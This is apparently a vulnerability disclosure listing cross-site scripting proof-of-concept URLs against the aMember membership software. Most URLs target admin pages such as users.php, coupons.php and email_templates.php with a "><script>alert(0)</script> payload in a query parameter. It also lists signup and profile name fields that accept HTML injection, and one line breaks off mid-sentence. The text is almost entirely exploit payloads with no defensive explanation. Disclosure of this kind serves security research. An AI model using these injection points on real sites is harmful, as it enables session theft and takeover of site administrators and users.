http://www.example.com/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.example.com/amember/admin/users.php?status="><script>alert(0)</script>
http://www.example.com/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.example.com/amember/admin/users.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.example.com/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
http://www.example.com/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
http://www.example.com/amember/admin/products.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
http://www.example.com/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
http://www.example.com/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.example.com/amember/aff.php?action=<script>alert(0)</script> (this might only affect


HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.example.com/amember/signup.php (first- and last-name)
http://www.example.com/amember/aff_signup.php (first- and last-name)
http://www.example.com/amember/profile.php (first- and last-name)